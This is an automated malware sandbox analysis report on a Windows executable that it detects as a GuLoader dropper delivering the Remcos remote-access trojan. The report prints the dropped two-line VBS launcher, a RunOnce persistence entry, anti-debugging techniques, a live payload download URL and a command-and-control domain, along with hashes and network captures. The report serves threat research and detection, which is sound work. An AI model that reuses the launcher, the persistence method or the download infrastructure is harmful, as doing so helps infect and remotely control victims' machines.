Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Last function: Thread delayed

Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\UNDERDEVELOPED.exe\HOMOTYPYSet W = CreateObject("WScript.Shell")
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\UNDERDEVELOPED.exe\HOMOTYPYSoftware\Microsoft\Windows\CurrentVersion\RunOnceDRAWSPAN
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Code function: 1_2_02187EB3 rdtsc

1_2_02187EB3

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Code function: 1_2_02186663 LdrInitializeThunk,

1_2_02186663

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188817 mov eax, dword ptr fs:[00000030h]	1_2_02188817
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182EC2 mov eax, dword ptr fs:[00000030h]	1_2_02182EC2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02187540 mov eax, dword ptr fs:[00000030h]	1_2_02187540
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183944 mov eax, dword ptr fs:[00000030h]	1_2_02183944
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02187BB8 mov eax, dword ptr fs:[00000030h]	1_2_02187BB8
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021855ED mov eax, dword ptr fs:[00000030h]	1_2_021855ED

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'

Jump to behavior

Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: logs.dat.16.dr	Binary or memory string: [ Program Manager ]
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Registry Run Keys / Startup Folder11	Process Injection12	Masquerading1	Input Capture11	Security Software Discovery521	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder11	Virtualization/Sandbox Evasion22	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol212	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
pRcHGlVekw.exe	17%	ReversingLabs	Win32.Trojan.Fragtor
pRcHGlVekw.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe	17%	ReversingLabs	Win32.Trojan.Fragtor

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw	0%	Avira URL Cloud	safe
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin	0%	Avira URL Cloud	safe
http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wealthyrem.ddns.net	194.5.97.128	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw	true	Avira URL Cloud: safe	unknown
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0	pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.128	wealthyrem.ddns.net	Netherlands		208476	DANILENKODE	true
101.99.94.119	unknown	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458794
Start date:	03.08.2021
Start time:	18:58:35
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	pRcHGlVekw.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Suspected Instruction Hammering Hide Perf
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@175/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 25.8% (good quality ratio 6.7%) Quality average: 12.9% Quality standard deviation: 24.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 23.211.6.115, 168.61.161.212, 104.43.139.144, 23.211.4.86, 20.82.209.104, 40.112.88.60, 20.82.210.154, 80.67.82.235, 80.67.82.211, 20.54.110.249, 20.190.160.134, 20.190.160.75, 20.190.160.8, 20.190.160.136, 20.190.160.4, 20.190.160.129, 20.190.160.132, 20.190.160.73, 93.184.220.29, 40.127.240.158, 51.104.136.2, 20.82.209.183 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, ocsp.digicert.com, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/458794/sample/pRcHGlVekw.exe

Simulations

Behavior and APIs

Time	Type	Description
19:00:29	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs
19:00:38	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
194.5.97.128	JXblq0dqPN.exe	Get hash	malicious	Browse
	Fec9qUX4at.exe	Get hash	malicious	Browse
	LzbZ4T1iV8.exe	Get hash	malicious	Browse
	kGSHiWbgq9.exe	Get hash	malicious	Browse
	loKmeabs9V.exe	Get hash	malicious	Browse
101.99.94.119	JXblq0dqPN.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_fkWglQyCXO188.bin
	Fec9qUX4at.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_fkWglQyCXO188.bin
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin
	kGSHiWbgq9.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin
	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wealthyrem.ddns.net	JXblq0dqPN.exe	Get hash	malicious	Browse	194.5.97.128
	Fec9qUX4at.exe	Get hash	malicious	Browse	194.5.97.128
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	194.5.97.128
	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	JXblq0dqPN.exe	Get hash	malicious	Browse	101.99.94.119
	Fec9qUX4at.exe	Get hash	malicious	Browse	101.99.94.119
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	101.99.94.119
	kGSHiWbgq9.exe	Get hash	malicious	Browse	101.99.94.119
	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119
	Audio #Ud83d#Udcde lifewire.org.HTML	Get hash	malicious	Browse	111.90.141.176
	bitratencrypt.exe	Get hash	malicious	Browse	111.90.149.108
	svchost.exe	Get hash	malicious	Browse	111.90.149.108
	eVF243bmXC.exe	Get hash	malicious	Browse	111.90.149.108
	xSnF0lxFUX.exe	Get hash	malicious	Browse	111.90.146.149
	QppmM7JmZd.exe	Get hash	malicious	Browse	111.90.146.149
	vNiyRd4GcH.exe	Get hash	malicious	Browse	111.90.146.149
	4E825059CDC8C2116FF7737EEAD0E6482A2CBF0A5790D.exe	Get hash	malicious	Browse	111.90.146.149
	SecuriteInfo.com.Trojan.Win32.Save.a.2038.exe	Get hash	malicious	Browse	101.99.94.204
	Minutes of Meeting 22062021.exe	Get hash	malicious	Browse	111.90.147.240
	naxpJ9fFZ4.exe	Get hash	malicious	Browse	111.90.149.115
	dMH1IIv1a1.exe	Get hash	malicious	Browse	111.90.149.115
	bmaphis@cardinaltek.com_16465506 AMDocAtt.HTML	Get hash	malicious	Browse	111.90.140.91
	4cDyOofgzT.xlsm	Get hash	malicious	Browse	101.99.95.230
	4cDyOofgzT.xlsm	Get hash	malicious	Browse	101.99.95.230
DANILENKODE	jiYTQKf5gO.exe	Get hash	malicious	Browse	194.5.98.210
	JXblq0dqPN.exe	Get hash	malicious	Browse	194.5.97.128
	Global Wire Transfer.pdf.exe	Get hash	malicious	Browse	194.5.98.8
	New Order PO#42617.exe	Get hash	malicious	Browse	194.5.98.7
	KITCOFiberOptics_CompanyCertifcate.exe	Get hash	malicious	Browse	194.5.98.210
	7keerHhHvn.exe	Get hash	malicious	Browse	194.5.98.74
	Purchase.exe	Get hash	malicious	Browse	194.5.97.150
	Fec9qUX4at.exe	Get hash	malicious	Browse	194.5.97.128
	Ordonnance PL-PB39-210706,pdf.exe	Get hash	malicious	Browse	194.5.98.7
	Tzcyxxestkakhuvtmvfdserywturrfjrye.exe	Get hash	malicious	Browse	194.5.98.72
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	194.5.97.128
	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128
	1niECmfIcE.exe	Get hash	malicious	Browse	194.5.97.94
	Nuzbcdoajgupgalxelbnohzzeonlplvuro.exe	Get hash	malicious	Browse	194.5.98.7
	RueoUfi1MZ.exe	Get hash	malicious	Browse	194.5.98.3
	Departamento de contadores Consejos de pago 0.exe	Get hash	malicious	Browse	194.5.98.7
	04_extracted.exe	Get hash	malicious	Browse	194.5.97.18
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe Download File
Process:	C:\Users\user\Desktop\pRcHGlVekw.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	6.662154130313104
Encrypted:	false
SSDEEP:	1536:MfPqE74qa95aAmpcPTDo9flG6kPl9NIcGCp9bZYuQmiPY/peaja9QNE7YP:Mf5sR94AWc7Do3G60lM49eM/ptO9QeE
MD5:	D2CB32F7C7F384B4BAA8DD13D6B5BBAB
SHA1:	355ACB5AF5CAAEB59FD7C9E0A54B501C24D47919
SHA-256:	2BD846BDDA945DC48A21C9BDA1497FEB9E67DF8CFB024CC8669041490C7C9A90
SHA-512:	0D620354C0C94604A37277C2029832D4AFF586918821ED058F94FD0AB02817F7E9E48A4B53F221B0BB9617E9F5F349B0494E678694AC1D9053BB30F6B3766913
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...IG.T.................@..........D........P....@..................................q......................................TK..(....p...[..................................................................(... .......\|............................text....=.......@.................. ..`.data...\....P.......P..............@....rsrc....[...p...`...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs Download File
Process:	C:\Users\user\Desktop\pRcHGlVekw.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	119
Entropy (8bit):	5.104016732419952
Encrypted:	false
SSDEEP:	3:jfF+m8nhvF3mRDWXp5cViE2J5xAII1oyhgMHC:jFqhv9IWXp+N23fmhnC
MD5:	FCA010003BC83A3D0D5FA585F5B62900
SHA1:	2F0FEECD1CE61F34A74174844E09A5AA06FB748D
SHA-256:	C0329C71251FD21B5E0060D8AA0ADB702848B6B88EF451D33C1A72CF6532F4DC
SHA-512:	8FF45F3C8756EEC569C44DEB51D1F30D125C9735700EBE9885E7163884C350AC9C7C1F78BD930224F8E0FD45214F415CAEE0F55BA273C6500E9E31DF71DE1B10
Malicious:	true
Reputation:	low
Preview:	Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe")

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Users\user\Desktop\pRcHGlVekw.exe
File Type:	data
Category:	dropped
Size (bytes):	148
Entropy (8bit):	3.3396233491666556
Encrypted:	false
SSDEEP:	3:rklKlmuGlclNXWlfcl5JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKIuGGafU5YcIeeDAlybW/G
MD5:	11433C9F76522D182E47B45E4AD5FD05
SHA1:	323674941D097ED5A15FBB6D3047240107922107
SHA-256:	21F21F6860F7D09D401BC84C2117167B91F15A8D22398893A6D189384764C157
SHA-512:	C157410A9FC604B8CB79B46006AADADCB0D2C55E955BB7E64A23C1C64B0DF0884FA68148313D63F669D1E0E3B6DA49A2ECD611775EACD122B0D81897D5B2AF25
Malicious:	false
Reputation:	low
Preview:	....[.2.0.2.1./.0.8./.0.3. .1.9.:.0.0.:.3.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.662154130313104
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	pRcHGlVekw.exe
File size:	114688
MD5:	d2cb32f7c7f384b4baa8dd13d6b5bbab
SHA1:	355acb5af5caaeb59fd7c9e0a54b501c24d47919
SHA256:	2bd846bdda945dc48a21c9bda1497feb9e67df8cfb024cc8669041490c7c9a90
SHA512:	0d620354c0c94604a37277c2029832d4aff586918821ed058f94fd0ab02817f7e9e48a4b53f221b0bb9617e9f5f349b0494e678694ac1d9053bb30f6b3766913
SSDEEP:	1536:MfPqE74qa95aAmpcPTDo9flG6kPl9NIcGCp9bZYuQmiPY/peaja9QNE7YP:Mf5sR94AWc7Do3G60lM49eM/ptO9QeE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...IG.T.................@..........D........P....@................

File Icon


Icon Hash:	6a4a266a2a3a2a2a

Static PE Info

General
Entrypoint:	0x401144
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x54A54749 [Thu Jan 1 13:10:33 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5565993a5a9f2bfb76f28ab304be6bc1

Entrypoint Preview

Instruction
push 00406B3Ch
call 00007F4E1CCD0115h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
dec eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi-0Ah], bl
dec ecx
neg byte ptr [edi+ebx*2+16A34338h]
fisttp qword ptr [esi-28D14792h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc edx
add byte ptr [esi], al
push eax
add dword ptr [ecx], 53h
push esp
inc ebp
dec esi
push esp
dec edi
push edx
push ebx
push esp
inc ebp
dec ebp
dec ebp
inc ebp
push edx
dec esi
inc ebp
add byte ptr [eax], al
add byte ptr [eax], al
rcr byte ptr [ecx+03h], 00000000h
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
pop es
dec edx
or byte ptr [eax], ah
std
out 3Ah, al
inc edi
xchg byte ptr [edx+6Bh], bh
out dx, eax
in al, dx
inc esp
je 00007F4E1CCD0111h
pop edi
scasb
add byte ptr [ebp-57B79F5Ch], bh
lodsd
je 00007F4E1CCD015Ah
and esi, esp
push es
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc esi
pop ecx
add byte ptr [eax], al
pop eax
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [esi+45h], al
push esp
dec ecx
push ebx
dec eax
dec ecx
push ebx
inc ebp
add byte ptr [00000001h], cl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14b54	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x5b8e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x7c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13dd4	0x14000	False	0.651550292969	data	7.08042704515	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x115c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x5b8e	0x6000	False	0.545694986979	data	6.03858270221	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1bce6	0xea8	data
RT_ICON	0x1b43e	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 3641116991, next used block 3644398388
RT_ICON	0x1aed6	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x1892e	0x25a8	data
RT_ICON	0x17886	0x10a8	data
RT_ICON	0x1741e	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x173c4	0x5a	data
RT_VERSION	0x171e0	0x1e4	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

Version Infos

Description	Data
Translation	0x0404 0x04b0
ProductVersion	1.00
InternalName	LIEGEMAN
FileVersion	1.00
OriginalFilename	LIEGEMAN.exe
ProductName	KORPSENES

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 19:01:31.359549046 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.404753923 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.405019045 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.451824903 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.451909065 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.500464916 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.500549078 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.500612020 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.500654936 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.500718117 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.500751019 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.500755072 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.546262026 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546298027 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546320915 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546341896 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546359062 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546380997 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546401978 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546418905 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546570063 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.546623945 CEST	49736	80	192.168.2.3	101.99.94.119
